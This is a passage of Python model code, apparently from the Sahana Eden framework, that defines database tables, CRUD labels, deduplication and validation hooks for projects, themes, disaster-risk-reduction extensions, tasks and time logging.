comment=S3AddResourceLink(c="org",
f="organisation",
label=T("Add Organization"),
title=messages.ORGANISATION,
tooltip=organisation_help)
),
Field("role", "integer",
label = T("Role"),
requires = IS_NULL_OR(
IS_IN_SET(project_organisation_roles)
),
represent = lambda opt: \
project_organisation_roles.get(opt,
NONE)),
Field("amount", "double",
requires = IS_NULL_OR(
IS_FLOAT_AMOUNT()),
represent = lambda v: \
IS_FLOAT_AMOUNT.represent(v, precision=2),
widget = IS_FLOAT_AMOUNT.widget,
label = T("Funds Contributed")),
s3_currency(),
s3_comments(),
*s3_meta_fields())
# CRUD Strings
ADD_PROJECT_ORG = T("Add Organization to Project")
current.response.s3.crud_strings[tablename] = Storage(
title_create = ADD_PROJECT_ORG,
title_display = T("Project Organization Details"),
title_list = T("Project Organizations"),
title_update = T("Edit Project Organization"),
title_search = T("Search Project Organizations"),
title_upload = T("Import Project Organizations"),
title_report = T("Funding Report"),
subtitle_create = T("Add Organization to Project"),
label_list_button = T("List Project Organizations"),
label_create_button = ADD_PROJECT_ORG,
label_delete_button = T("Remove Organization from Project"),
msg_record_created = T("Organization added to Project"),
msg_record_modified = T("Project Organization updated"),
msg_record_deleted = T("Organization removed from Project"),
msg_list_empty = T("No Organizations for Project(s)"))
# Report Options
report_fields = ["project_id",
"organisation_id",
"role",
"amount",
"currency",
]
report_options = Storage(rows = report_fields,
cols = report_fields,
fact = report_fields,
#methods = ["sum"],
defaults = Storage(rows = "organisation.organisation_id",
cols = "organisation.currency",
fact = "organisation.amount",
aggregate = "sum",
totals = False
)
)
# Resource Configuration
self.configure(tablename,
report_options = report_options,
deduplicate=self.project_organisation_deduplicate,
onvalidation=self.project_organisation_onvalidation,
onaccept=self.project_organisation_onaccept,
ondelete=self.project_organisation_ondelete,
)
# Pass names back to global scope (s3.*)
return dict()
# -------------------------------------------------------------------------
@staticmethod
def project_organisation_onvalidation(form, lead_role=None):
""" Form validation """
if lead_role is None:
lead_role = current.deployment_settings.get_project_organisation_lead_role()
vars = form.vars
project_id = vars.project_id
organisation_id = vars.organisation_id
if str(vars.role) == str(lead_role) and project_id:
db = current.db
otable = db.project_organisation
query = (otable.deleted != True) & \
(otable.project_id == project_id) & \
(otable.role == lead_role) & \
(otable.organisation_id != organisation_id)
row = db(query).select(otable.id,
limitby=(0, 1)).first()
if row:
form.errors.role = \
current.T("Lead Implementer for this project is already set, please choose another role.")
return
# -------------------------------------------------------------------------
@staticmethod
def project_organisation_onaccept(form):
"""
Record creation post-processing
If the added organisation is the lead role, set the
project.organisation to point to the same organisation
& update the realm_entity.
"""
vars = form.vars
if str(vars.role) == \
str(current.deployment_settings.get_project_organisation_lead_role()):
# Read the record
# (safer than relying on vars which might be missing on component tabs)
db = current.db
ltable = db.project_organisation
record = db(ltable.id == vars.id).select(ltable.project_id,
ltable.organisation_id,
limitby=(0, 1)
).first()
# Set the Project's organisation_id to the new lead organisation
organisation_id = record.organisation_id
ptable = db.project_project
db(ptable.id == record.project_id).update(
organisation_id = organisation_id,
realm_entity = \
current.s3db.pr_get_pe_id("org_organisation",
organisation_id)
)
# -------------------------------------------------------------------------
@staticmethod
def project_organisation_ondelete(row):
"""
Executed when a project organisation record is deleted.
If the deleted organisation is the lead role on this project,
set the project organisation to None.
"""
db = current.db
potable = db.project_organisation
ptable = db.project_project
query = (potable.id == row.get("id"))
deleted_row = db(query).select(potable.deleted_fk,
potable.role,
limitby=(0, 1)).first()
if str(deleted_row.role) == \
str(current.deployment_settings.get_project_organisation_lead_role()):
# Get the project_id
deleted_fk = json.loads(deleted_row.deleted_fk)
project_id = deleted_fk["project_id"]
# Set the project organisation_id to NULL (using None)
db(ptable.id == project_id).update(organisation_id=None)
return
# ---------------------------------------------------------------------
@staticmethod
def project_organisation_deduplicate(item):
""" Import item de-duplication """
if item.tablename != "project_organisation":
return
data = item.data
if "project_id" in data and \
"organisation_id" in data:
table = item.table
project_id = data.project_id
organisation_id = data.organisation_id
query = (table.project_id == project_id) & \
(table.organisation_id == organisation_id)
duplicate = current.db(query).select(table.id,
limitby=(0, 1)).first()
if duplicate:
item.id = duplicate.id
item.method = item.METHOD.UPDATE
return
# =============================================================================
class S3ProjectOutputModel(S3Model):
"""
Project Output Model
"""
names = ["project_output"]
def model(self):
T = current.T
db = current.db
NONE = current.messages["NONE"]
# ---------------------------------------------------------------------
# Outputs
#
tablename = "project_output"
self.define_table(tablename,
self.project_project_id(
# Override requires so that update access to the projects isn't required
requires = IS_ONE_OF(db, "project_project.id",
self.project_project_represent
)
),
Field("name",
represent = lambda v: v or NONE,
label = T("Output")),
Field("status",
represent = lambda v: v or NONE,
label = T("Status")),
*s3_meta_fields())
# CRUD Strings
current.response.s3.crud_strings[tablename] = Storage(
title_create = T("New Output"),
title_display = T("Output"),
title_list = T("Outputs"),
title_update = T("Edit Output"),
subtitle_create = T("Add New Output"),
label_list_button = T("List Outputs"),
label_create_button = T("New Output"),
msg_record_created = T("Output added"),
msg_record_modified = T("Output updated"),
msg_record_deleted = T("Output removed"),
msg_list_empty = T("No outputs found")
)
self.configure(tablename,
deduplicate = self.project_output_deduplicate,
)
# Pass names back to global scope (s3.*)
return dict()
# -------------------------------------------------------------------------
@staticmethod
def project_output_deduplicate(item):
""" Import item de-duplication """
if item.tablename != "project_output":
return
data = item.data
name = data.get("name", None)
project_id = data.get("project_id", None)
if name:
table = item.table
query = (table.name == name)
if project_id:
query &= ((table.project_id == project_id) | \
(table.project_id == None))
duplicate = current.db(query).select(table.id,
limitby=(0, 1)).first()
if duplicate:
item.id = duplicate.id
item.method = item.METHOD.UPDATE
# =============================================================================
class S3ProjectSectorModel(S3Model):
"""
Project Sector Model
"""
names = ["project_sector_project"]
def model(self):
T = current.T
# ---------------------------------------------------------------------
# Projects <> Sectors Link Table
#
tablename = "project_sector_project"
self.define_table(tablename,
self.org_sector_id(empty=False),
self.project_project_id(empty=False),
*s3_meta_fields()
)
# CRUD Strings
current.response.s3.crud_strings[tablename] = Storage(
title_create = T("New Sector"),
title_display = T("Sector"),
title_list = T("Sectors"),
title_update = T("Edit Sector"),
title_search = T("Search Sectors"),
title_upload = T("Import Sector data"),
subtitle_create = T("Add New Sector"),
label_list_button = T("List Sectors"),
label_create_button = T("Add Sector to Project"),
msg_record_created = T("Sector added to Project"),
msg_record_modified = T("Sector updated"),
msg_record_deleted = T("Sector removed from Project"),
msg_list_empty = T("No Sectors found for this Project")
)
# Pass names back to global scope (s3.*)
return dict()
# =============================================================================
class S3ProjectThemeModel(S3Model):
"""
Project Theme Model
"""
names = ["project_theme",
"project_theme_id",
"project_theme_sector",
"project_theme_project",
"project_theme_location",
]
def model(self):
T = current.T
db = current.db
add_component = self.add_component
configure = self.configure
crud_strings = current.response.s3.crud_strings
define_table = self.define_table
theme_percentages = current.deployment_settings.get_project_theme_percentages()
NONE = current.messages["NONE"]
# ---------------------------------------------------------------------
# Themes
#
tablename = "project_theme"
table = define_table(tablename,
Field("name",
length=128,
notnull=True,
unique=True,
label=T("Name"),
represent=lambda v: T(v) if v is not None \
else NONE,
),
s3_comments(),
*s3_meta_fields())
# CRUD Strings
ADD_THEME = T("Add Theme")
crud_strings[tablename] = Storage(
title_create = ADD_THEME,
title_display = T("Theme Details"),
title_list = T("Themes"),
title_update = T("Edit Theme"),
#title_upload = T("Import Themes"),
subtitle_create = T("Add New Theme"),
label_list_button = T("List Themes"),
label_create_button = ADD_THEME,
label_delete_button = T("Delete Theme"),
msg_record_created = T("Theme added"),
msg_record_modified = T("Theme updated"),
msg_record_deleted = T("Theme deleted"),
msg_list_empty = T("No Themes currently registered"))
# Reusable Field
represent = S3Represent(lookup=tablename, translate=True)
theme_id = S3ReusableField("theme_id", table,
label = T("Theme"),
sortby = "name",
requires = IS_NULL_OR(
IS_ONE_OF(db, "project_theme.id",
represent,
sort=True)),
represent = represent,
ondelete = "CASCADE")
# Field settings for project_project.theme field in friendly_string_from_field_query function
# - breaks Action Buttons, so moved to inside the fn which calls them
#table.id.represent = represent
#table.id.label = T("Theme")
# Components
add_component("project_theme_project", project_theme="theme_id")
add_component("project_theme_sector", project_theme="theme_id")
# For Sync Filter
add_component("org_sector",
project_theme=Storage(link="project_theme_sector",
joinby="theme_id",
key="sector_id"))
crud_form = S3SQLCustomForm(
"name",
# Project Sectors
S3SQLInlineComponent(
"theme_sector",
label=T("Sectors to which this Theme can apply"),
fields=["sector_id"],
),
"comments"
)
configure(tablename,
crud_form=crud_form,
list_fields=["id",
"name",
(T("Sectors"), "theme_sector.sector_id"),
"comments",
])
# ---------------------------------------------------------------------
# Theme - Sector Link Table
#
tablename = "project_theme_sector"
table = define_table(tablename,
theme_id(empty=False),
self.org_sector_id(label="",
empty=False),
*s3_meta_fields())
crud_strings[tablename] = Storage(
title_create = T("New Sector"),
title_display = T("Sector"),
title_list = T("Sectors"),
title_update = T("Edit Sector"),
title_search = T("Search Sectors"),
title_upload = T("Import Sector data"),
subtitle_create = T("Add New Sector"),
label_list_button = T("List Sectors"),
label_create_button = T("Add Sector to Theme"),
msg_record_created = T("Sector added to Theme"),
msg_record_modified = T("Sector updated"),
msg_record_deleted = T("Sector removed from Theme"),
msg_list_empty = T("No Sectors found for this Theme")
)
# ---------------------------------------------------------------------
# Theme - Project Link Table
#
tablename = "project_theme_project"
table = define_table(tablename,
theme_id(empty=False),
self.project_project_id(empty=False),
# % breakdown by theme (sector in IATI)
Field("percentage", "integer",
label = T("Percentage"),
default = 0,
requires = IS_INT_IN_RANGE(0, 101),
readable = theme_percentages,
writable = theme_percentages,
),
*s3_meta_fields())
crud_strings[tablename] = Storage(
title_create = T("New Theme"),
title_display = T("Theme"),
title_list = T("Themes"),
title_update = T("Edit Theme"),
title_search = T("Search Themes"),
#title_upload = T("Import Theme data"),
subtitle_create = T("Add New Theme"),
label_list_button = T("List Themes"),
label_create_button = T("Add Theme to Project"),
msg_record_created = T("Theme added to Project"),
msg_record_modified = T("Theme updated"),
msg_record_deleted = T("Theme removed from Project"),
msg_list_empty = T("No Themes found for this Project")
)
configure(tablename,
deduplicate=self.project_theme_project_deduplicate,
onaccept = self.project_theme_project_onaccept
)
# ---------------------------------------------------------------------
# Theme - Project Location Link Table
#
tablename = "project_theme_location"
table = define_table(tablename,
theme_id(empty=False),
self.project_location_id(empty=False),
# % breakdown by theme (sector in IATI)
Field("percentage", "integer",
label = T("Percentage"),
default = 0,
requires = IS_INT_IN_RANGE(0, 101),
readable = theme_percentages,
writable = theme_percentages,
),
*s3_meta_fields())
crud_strings[tablename] = Storage(
title_create = T("New Theme"),
title_display = T("Theme"),
title_list = T("Themes"),
title_update = T("Edit Theme"),
title_search = T("Search Themes"),
title_upload = T("Import Theme data"),
subtitle_create = T("Add New Theme"),
label_list_button = T("List Themes"),
label_create_button = T("Add Theme to Project Location"),
msg_record_created = T("Theme added to Project Location"),
msg_record_modified = T("Theme updated"),
msg_record_deleted = T("Theme removed from Project Location"),
msg_list_empty = T("No Themes found for this Project Location")
)
# Pass names back to global scope (s3.*)
return dict()
# -------------------------------------------------------------------------
@staticmethod
def project_theme_project_onaccept(form):
"""
Record creation post-processing
Update the percentages of all the Project's Locations.
"""
# Check for prepop
project_id = form.vars.get("project_id", None)
if not project_id and form.request_vars:
# Interactive form
project_id = form.request_vars.get("project_id", None)
if not project_id:
return
# Calculate the list of Percentages for this Project
percentages = {}
db = current.db
table = db.project_theme_project
query = (table.deleted == False) & \
(table.project_id == project_id)
rows = db(query).select(table.theme_id,
table.percentage)
for row in rows:
percentages[row.theme_id] = row.percentage
# Update the Project's Locations
s3db = current.s3db
table = s3db.project_location
ltable = s3db.project_theme_location
update_or_insert = ltable.update_or_insert
query = (table.deleted == False) & \
(table.project_id == project_id)
rows = db(query).select(table.id)
for row in rows:
for theme_id in percentages:
update_or_insert(project_location_id = row.id,
theme_id = theme_id,
percentage = percentages[theme_id])
# -------------------------------------------------------------------------
@staticmethod
def project_theme_project_deduplicate(item):
""" Import item de-duplication """
if item.tablename != "project_theme_project":
return
data = item.data
if "project_id" in data and \
"theme_id" in data:
project_id = data.project_id
theme_id = data.theme_id
table = item.table
query = (table.project_id == project_id) & \
(table.theme_id == theme_id)
duplicate = current.db(query).select(table.id,
limitby=(0, 1)).first()
if duplicate:
item.id = duplicate.id
item.method = item.METHOD.UPDATE
return
# =============================================================================
class S3ProjectDRRModel(S3Model):
"""
Models for DRR (Disaster Risk Reduction) extensions
"""
names = ["project_drr"]
def model(self):
T = current.T
project_hfa_opts = self.project_hfa_opts()
hfa_opts = dict([(opt, "HFA %s" % opt) for opt in project_hfa_opts])
tablename = "project_drr"
self.define_table(tablename,
self.project_project_id(empty=False),
Field("hfa", "list:integer",
label = T("HFA Priorities"),
requires = IS_NULL_OR(IS_IN_SET(
hfa_opts,
multiple = True)),
widget = S3GroupedOptionsWidget(
cols=1,
help_field=project_hfa_opts
),
represent = S3Represent(options=hfa_opts,
multiple=True),
),
*s3_meta_fields())
# Pass names back to global scope (s3.*)
return dict()
# -------------------------------------------------------------------------
@staticmethod
def hfa_opts_represent(opt):
""" Option representation """
if not opt:
return current.messages["NONE"]
if isinstance(opt, int):
opts = [opt]
elif not isinstance(opt, (list, tuple)):
return current.messages["NONE"]
else:
opts = opt
if opts[0] is None:
return current.messages["NONE"]
vals = ["HFA %s" % o for o in opts]
return ", ".join(vals)
# =============================================================================
class S3ProjectDRRPPModel(S3Model):
"""
Models for DRR Project Portal extensions
- injected into custom Project CRUD forms
"""
names = ["project_drrpp"]
def model(self):
T = current.T
db = current.db
NONE = current.messages["NONE"]
local_currencies = current.deployment_settings.get_fin_currencies().keys()
local_currencies.remove("USD")
project_rfa_opts = self.project_rfa_opts()
project_pifacc_opts = self.project_pifacc_opts()
project_jnap_opts = self.project_jnap_opts()
tablename = "project_drrpp"
self.define_table(tablename,
self.project_project_id(
# Override requires so that update access to the projects isn't required
requires = IS_ONE_OF(db, "project_project.id",
self.project_project_represent
)
),
Field("parent_project",
represent = lambda v: v or NONE,
label = T("Name of a programme or another project which this project is implemented as part of"),
#comment = DIV(_class="tooltip",
# _title="%s|%s" % (T("Parent Project"),
# T("The parent project or programme which this project is implemented under"))),
),
Field("duration", "integer",
represent = lambda v: v or NONE,
label = T("Duration (months)")),
Field("local_budget", "double",
label = T("Total Funding (Local Currency)"),
represent = lambda v: \
IS_FLOAT_AMOUNT.represent(v, precision=2)),
s3_currency("local_currency",
label = T("Local Currency"),
requires = IS_IN_SET(local_currencies,
zero=None)
),
Field("activities", "text",
represent = lambda v: v or NONE,
label = T("Activities")),
Field("rfa", "list:integer",
label = T("RFA Priorities"),
requires = IS_NULL_OR(
IS_IN_SET(project_rfa_opts.keys(),
labels = ["RFA %s" % \
rfa for rfa in project_rfa_opts.keys()],
multiple = True)),
represent = lambda opt: \
self.opts_represent(opt, "RFA"),
widget = lambda f, v, **attr: \
s3_grouped_checkboxes_widget(f, v,
help_field=project_rfa_opts,
**attr),
comment = DIV(_class="tooltip",
_title="%s|%s" % (T("RFA Priorities"),
T("Applicable to projects in Pacific countries only")))),
Field("pifacc", "list:integer",
label = T("PIFACC Priorities"),
requires = IS_NULL_OR(
IS_IN_SET(project_pifacc_opts.keys(),
labels = ["PIFACC %s" % \
pifacc for pifacc in project_pifacc_opts.keys()],
multiple = True)),
represent = lambda opt: \
self.opts_represent(opt, "PIFACC"),
widget = lambda f, v, **attr: \
s3_grouped_checkboxes_widget(f, v,
help_field=project_pifacc_opts,
**attr),
comment = DIV(_class="tooltip",
_title="%s|%s" % (T("PIFACC Priorities"),
T("Pacific Islands Framework for Action on Climate Change. Applicable to projects in Pacific countries only")))),
Field("jnap", "list:integer",
label = T("JNAP Priorities"),
requires = IS_NULL_OR(
IS_IN_SET(project_jnap_opts.keys(),
labels = ["JNAP %s" % \
jnap for jnap in project_jnap_opts.keys()],
multiple = True)),
represent = lambda opt: \
self.opts_represent(opt, "JNAP"),
widget = lambda f, v, **attr: \
s3_grouped_checkboxes_widget(f, v,
help_field=project_jnap_opts,
**attr),
comment = DIV(_class="tooltip",
_title="%s|%s" % (T("JNAP Priorities"),
T("Joint National Action Plan for Disaster Risk Management and Climate Change Adaptation. Applicable to Cook Islands only")))),
Field("L1", "list:integer",
label = T("Cook Islands"),
requires = IS_NULL_OR(
IS_ONE_OF(db, "gis_location.id",
S3Represent(lookup="gis_location"),
filterby = "L0",
filter_opts = ["Cook Islands"],
not_filterby = "name",
not_filter_opts = ["Cook Islands"],
multiple=True)),
represent = S3Represent(lookup="gis_location",
multiple=True),
widget = lambda f, v, **attr: \
s3_checkboxes_widget(f, v, cols=4, **attr),
),
Field("outputs", "text",
label = "%s (Old - do NOT use)" % T("Outputs"),
represent = lambda v: v or NONE,
readable = False,
writable = False,
),
Field("focal_person",
represent = lambda v: v or NONE,
requires = IS_NOT_EMPTY(),
label = T("Focal Person")),
self.org_organisation_id(label = T("Organization")),
Field("email",
requires=IS_NULL_OR(IS_EMAIL()),
represent = lambda v: v or NONE,
label = T("Email")),
*s3_meta_fields())
# CRUD Strings
current.response.s3.crud_strings[tablename] = Storage(
title_display = T("DRRPP Extensions"),
title_update = T("Edit DRRPP Extensions"),
)
self.configure(tablename,
onaccept = self.project_drrpp_onaccept,
)
# Pass names back to global scope (s3.*)
return dict()
# -------------------------------------------------------------------------
@staticmethod
def project_drrpp_onaccept(form):
"""
After DB I/O tasks for Project DRRPP records
"""
db = current.db
vars = form.vars
id = vars.id
project_id = vars.project_id
dtable = db.project_drrpp
if not project_id:
# Most reliable way to get the project_id is to read the record
project_id = db(dtable.id == id).select(dtable.project_id,
limitby=(0, 1)
).first().project_id
table = db.project_project
hr_id = db(table.id == project_id).select(table.human_resource_id,
limitby=(0, 1)
).first().human_resource_id
if hr_id:
s3db = current.s3db
htable = db.hrm_human_resource
ctable = s3db.pr_contact
ptable = db.pr_person
query = (htable.id == hr_id) & \
(ptable.id == htable.person_id)
left = ctable.on((ctable.pe_id == ptable.pe_id) & \
(ctable.contact_method == "EMAIL"))
row = db(query).select(htable.organisation_id,
ptable.first_name,
ptable.middle_name,
ptable.last_name,
ctable.value,
left=left,
limitby=(0, 1)).first()
focal_person = s3_fullname(row[ptable])
organisation_id = row[htable].organisation_id
email = row[ctable].value
db(dtable.id == id).update(focal_person = focal_person,
organisation_id = organisation_id,
email = email,
)
# -------------------------------------------------------------------------
@staticmethod
def opts_represent(opt, prefix):
""" Option representation """
if isinstance(opt, int):
opts = [opt]
if isinstance(opt, (list, tuple)):
if not opt or opt[0] is None:
return current.messages["NONE"]
else:
return ", ".join(["%s %s" % (prefix, o) for o in opt])
else:
return current.messages["NONE"]
# =============================================================================
class S3ProjectTaskModel(S3Model):
"""
Project Task Model
This class holds the tables used for an Organisation to manage
their Tasks in detail.
"""
names = ["project_milestone",
"project_task",
"project_task_id",
"project_time",
"project_comment",
"project_task_project",
"project_task_activity",
"project_task_milestone",
"project_task_represent_w_project",
]
def model(self):
db = current.db
T = current.T
auth = current.auth
request = current.request
project_id = self.project_project_id
messages = current.messages
UNKNOWN_OPT = messages.UNKNOWN_OPT
# Shortcuts
add_component = self.add_component
configure = self.configure
crud_strings = current.response.s3.crud_strings
define_table = self.define_table
set_method = self.set_method
super_link = self.super_link
# ---------------------------------------------------------------------
# Project Milestone
#
tablename = "project_milestone"
table = define_table(tablename,
# Stage Report
super_link("doc_id", "doc_entity"),
project_id(),
Field("name",
label = T("Short Description"),
requires=IS_NOT_EMPTY()),
s3_date(),
s3_comments(),
*s3_meta_fields())
# CRUD Strings
ADD_MILESTONE = T("Add Milestone")
crud_strings[tablename] = Storage(
title_create = ADD_MILESTONE,
title_display = T("Milestone Details"),
title_list = T("Milestones"),
title_update = T("Edit Milestone"),
title_search = T("Search Milestones"),
#title_upload = T("Import Milestones"),
subtitle_create = T("Add New Milestone"),
label_list_button = T("List Milestones"),
label_create_button = ADD_MILESTONE,
msg_record_created = T("Milestone Added"),
msg_record_modified = T("Milestone Updated"),
msg_record_deleted = T("Milestone Deleted"),
msg_list_empty = T("No Milestones Found")
)
# Reusable Field
represent = S3Represent(lookup=tablename,
fields=["name", "date"],
labels="%(name)s: %(date)s",
)
milestone_id = S3ReusableField("milestone_id", table,
sortby="name",
requires = IS_NULL_OR(
IS_ONE_OF(db, "project_milestone.id",
represent)),
represent = represent,
comment = S3AddResourceLink(c="project",
f="milestone",
title=ADD_MILESTONE,
tooltip=T("A project milestone marks a significant date in the calendar which shows that progress towards the overall objective is being made.")),
label = T("Milestone"),
ondelete = "RESTRICT")
configure(tablename,
orderby=table.date,
)
# ---------------------------------------------------------------------
# Tasks
#
# Tasks can be linked to Activities or directly to Projects
# - they can also be used by the Event/Scenario modules
#
# @ToDo: Task templates
# @ToDo: Recurring tasks
#
# These Statuses can be customised, although doing so limits the ability to do synchronization
# - best bet is simply to comment statuses that you don't wish to use
#
project_task_status_opts = {
1: T("Draft"),
2: T("New"),
3: T("Assigned"),
4: T("Feedback"),
5: T("Blocked"),
6: T("On Hold"),
7: T("Canceled"),
8: T("Duplicate"),
9: T("Ready"),
10: T("Verified"),
11: T("Reopened"),
12: T("Completed"),
#99: T("unspecified")
}
project_task_active_statuses = [2, 3, 4, 11]
project_task_priority_opts = {
1:T("Urgent"),
2:T("High"),
3:T("Normal"),
4:T("Low")
}
#staff = auth.s3_has_role("STAFF")
staff = True
settings = current.deployment_settings
tablename = "project_task"
table = define_table(tablename,
super_link("doc_id", "doc_entity"),
Field("template", "boolean",
default=False,
readable=False,
writable=False),
Field("name",
label = T("Short Description"),
length=100,
notnull=True,
requires = IS_LENGTH(maxsize=100, minsize=1)),
Field("description", "text",
label = T("Detailed Description/URL"),
comment = DIV(_class="tooltip",
_title="%s|%s" % (T("Detailed Description/URL"),
T("Please provide as much detail as you can, including the URL(s) where the bug occurs or you'd like the new feature to go.")))),
self.org_site_id,
self.gis_location_id(
label=T("Deployment Location"),
readable=False,
writable=False
),
Field("source",
label = T("Source")),
Field("priority", "integer",
requires = IS_IN_SET(project_task_priority_opts,
zero=None),
default = 3,
label = T("Priority"),
represent = lambda opt: \
project_task_priority_opts.get(opt,
UNKNOWN_OPT)),
# Could be a Person, Team or Organisation
super_link("pe_id", "pr_pentity",
readable = staff,
writable = staff,
label = T("Assigned to"),
filterby = "instance_type",
filter_opts = ["pr_person", "pr_group", "org_organisation"],
represent = self.project_assignee_represent,
# @ToDo: Widget
#widget = S3PentityWidget(),
#comment = DIV(_class="tooltip",
# _title="%s|%s" % (T("Assigned to"),
# T("Enter some characters to bring up a list of possible matches")))
),
s3_datetime("date_due",
label = T("Date Due"),
past=0,
future=8760, # Hours, so 1 year
represent="date",
readable = staff,
writable = staff,
),
Field("time_estimated", "double",
readable = staff,
writable = staff,
represent = lambda v: v or "",
label = "%s (%s)" % (T("Time Estimate"),
T("hours"))),
Field("time_actual", "double",
readable = staff,
# This comes from the Time component
writable=False,
label = "%s (%s)" % (T("Time Taken"),
T("hours"))),
Field("status", "integer",
requires = IS_IN_SET(project_task_status_opts,
zero=None),
default = 2,
readable = staff,
writable = staff,
label = T("Status"),
represent = lambda opt: \
project_task_status_opts.get(opt,
UNKNOWN_OPT)),
*s3_meta_fields())
# Virtual field
table.task_id = Field.Lazy(self.project_task_task_id)
# Field configurations
# Comment these if you don't need a Site associated with Tasks
#table.site_id.readable = table.site_id.writable = True
#table.site_id.label = T("Check-in at Facility") # T("Managing Office")
table.created_on.represent = lambda dt: \
S3DateTime.date_represent(dt, utc=True)
# CRUD Strings
ADD_TASK = T("Add Task")
crud_strings[tablename] = Storage(
title_create = ADD_TASK,
title_display = T("Task Details"),
title_list = T("Tasks"),
title_update = T("Edit Task"),
title_search = T("Search Tasks"),
title_upload = T("Import Tasks"),
subtitle_create = T("Add New Task"),
label_list_button = T("List Tasks"),
label_create_button = ADD_TASK,
msg_record_created = T("Task added"),
msg_record_modified = T("Task updated"),
msg_record_deleted = T("Task deleted"),
msg_list_empty = T("No tasks currently registered"))
# Search Method
filter_widgets = [
S3TextFilter(["name",
"description",
],
label=T("Description"),
_class="filter-search",
),
S3OptionsFilter("priority",
label=T("Priority"),
#represent="%(name)s",
#widget="multiselect",
options=project_task_priority_opts,
cols=4,
),
S3OptionsFilter("task_project.project_id",
label=T("Project"),
options = self.project_task_project_opts,
#represent="%(name)s",
#widget="multiselect",
cols=3,
),
S3OptionsFilter("task_activity.activity_id",
label=T("Activity"),
options = self.project_task_activity_opts,
#represent="%(name)s",
#widget="multiselect",
cols=3,
),
S3OptionsFilter("pe_id",
label=T("Assigned To"),
# @ToDo: Implement support for this in S3OptionsFilter
#null = T("Unassigned"),
#represent="%(name)s",
#widget="multiselect",
cols=4,
),
S3OptionsFilter("created_by",
label=T("Created By"),
#widget="multiselect",
cols=3,
hidden=True,
),
S3RangeFilter("created_on",
label=T("Date Created"),
hide_time=True,
hidden=True,
),
S3RangeFilter("date_due",
label=T("Date Due"),
hide_time=True,
hidden=True,
),
S3RangeFilter("modified_on",
label=T("Date Modified"),
hide_time=True,
hidden=True,
),
S3OptionsFilter("status",
label=T("Status"),
options=project_task_status_opts,
#represent="%(name)s",
#widget="multiselect",
cols=4,
),
]
list_fields=["id",
(T("ID"), "task_id"),
"priority",
"name",
"pe_id",
"date_due",
"time_estimated",
"time_actual",
"created_on",
"status",
#"site_id"
]
if settings.get_project_milestones():
# Use the field in this format to get the custom represent
list_fields.insert(5, (T("Milestone"), "task_milestone.milestone_id"))
filter_widgets.insert(4, S3OptionsFilter("task_milestone.milestone_id",
label = T("Milestone"),
options = self.project_task_milestone_opts,
cols = 3
))
report_options = Storage(rows = list_fields,
cols = list_fields,
fact = list_fields,
defaults = Storage(rows = "task.project",
cols = "task.pe_id",
fact = "sum(task.time_estimated)",
totals = True
),
)
# Custom Form
crud_form = S3SQLCustomForm(
"name",
"description",
"source",
"priority",
"pe_id",
"date_due",
"time_estimated",
"status",
S3SQLInlineComponent(
"time",
label = T("Time Log"),
fields = ["date",
"person_id",
"hours",
"comments"
],
orderby = "date"
),
"time_actual",
)
# Resource Configuration
configure(tablename,
super_entity = "doc_entity",
copyable = True,
orderby = "project_task.priority,project_task.date_due asc",
realm_entity = self.project_task_realm_entity,
onvalidation = self.project_task_onvalidation,
#create_next = URL(f="task", args=["[id]"]),
create_onaccept = self.project_task_create_onaccept,
update_onaccept = self.project_task_update_onaccept,
filter_widgets = filter_widgets,
report_options = report_options,
list_fields = list_fields,
extra_fields = ["id"],
crud_form = crud_form,
extra = "description"
)
# Reusable field
task_id = S3ReusableField("task_id", table,
label = T("Task"),
sortby="name",
requires = IS_NULL_OR(
IS_ONE_OF(db, "project_task.id",
self.project_task_represent)),
represent = self.project_task_represent,
comment = S3AddResourceLink(c="project",
f="task",
title=ADD_TASK,
tooltip=T("A task is a piece of work that an individual or team can do in 1-2 days.")),
ondelete = "CASCADE")
# Custom Methods
set_method("project", "task",
method="dispatch",
action=self.project_task_dispatch)
# Components
# Projects (for imports)
add_component("project_project",
project_task=dict(link="project_task_project",
joinby="task_id",
key="project_id",
actuate="embed",
autocomplete="name",
autodelete=False))
# Activities
add_component("project_activity",
project_task=dict(link="project_task_activity",
joinby="task_id",
key="activity_id",
actuate="embed",
autocomplete="name",
autodelete=False))
# Milestones
add_component("project_milestone",
project_task=dict(link="project_task_milestone",
joinby="task_id",
key="milestone_id",
actuate="embed",
autocomplete="name",
autodelete=False))
# Job titles
add_component("hrm_job_title",
project_task=dict(link="project_task_job_title",
joinby="task_id",
key="job_title_id",
actuate="embed",
autocomplete="name",
autodelete=False))
# Human Resources (assigned)
add_component("hrm_human_resource",
project_task=dict(link="project_task_human_resource",
joinby="task_id",
key="human_resource_id",
actuate="embed",
autocomplete="name",
autodelete=False))
# Requests
add_component("req_req",
project_task=dict(link="project_task_req",
joinby="task_id",
key="req_id",
actuate="embed",
autocomplete="request_number",
autodelete=False))
# Time
add_component("project_time", project_task="task_id")
# Comments (for imports))
add_component("project_comment", project_task="task_id")
# ---------------------------------------------------------------------
# Link Tasks <-> Projects
#
tablename = "project_task_project"
table = define_table(tablename,
task_id(),
project_id(
# Override requires so that update access to the projects isn't required
requires = IS_ONE_OF(db, "project_project.id",
self.project_project_represent
)
),
*s3_meta_fields())
# ---------------------------------------------------------------------
# Link task <-> activity
#
# Tasks <> Activities
tablename = "project_task_activity"
table = define_table(tablename,
task_id(),
self.project_activity_id(),
*s3_meta_fields())
# ---------------------------------------------------------------------
# Link task <-> milestone
#
# Tasks <> Milestones
tablename = "project_task_milestone"
table = define_table(tablename,
task_id(),
milestone_id(),
*s3_meta_fields())
# ---------------------------------------------------------------------
# Project comment
#
# @ToDo: Attachments?
#
# Parent field allows us to:
# * easily filter for top-level threads
# * easily filter for next level of threading
# * hook a new reply into the correct location in the hierarchy
#
tablename = "project_comment"
table = define_table(tablename,
Field("parent", "reference project_comment",
requires = IS_EMPTY_OR(
IS_ONE_OF(db, "project_comment.id"
)),
readable=False),
task_id(),
Field("body", "text",
notnull=True,
label = T("Comment")),
*s3_meta_fields())
# Resource Configuration
configure(tablename,
list_fields=["id",
"task_id",
"created_by",
"modified_on"
])
# ---------------------------------------------------------------------
# Project Time
# - used to Log hours spent on a Task
#
tablename = "project_time"
table = define_table(tablename,
task_id(
requires = IS_ONE_OF(db, "project_task.id",
self.project_task_represent_w_project,
),
),
self.pr_person_id(default=auth.s3_logged_in_person(),
widget = SQLFORM.widgets.options.widget
),
s3_datetime(default="now",
past=8760, # Hours, so 1 year
future=0
),
Field("hours", "double",
label = "%s (%s)" % (T("Time"),
T("hours")),
represent=lambda v: \
IS_FLOAT_AMOUNT.represent(v, precision=2)),
s3_comments(),
*s3_meta_fields())
# CRUD Strings
ADD_TIME = T("Log Time Spent")
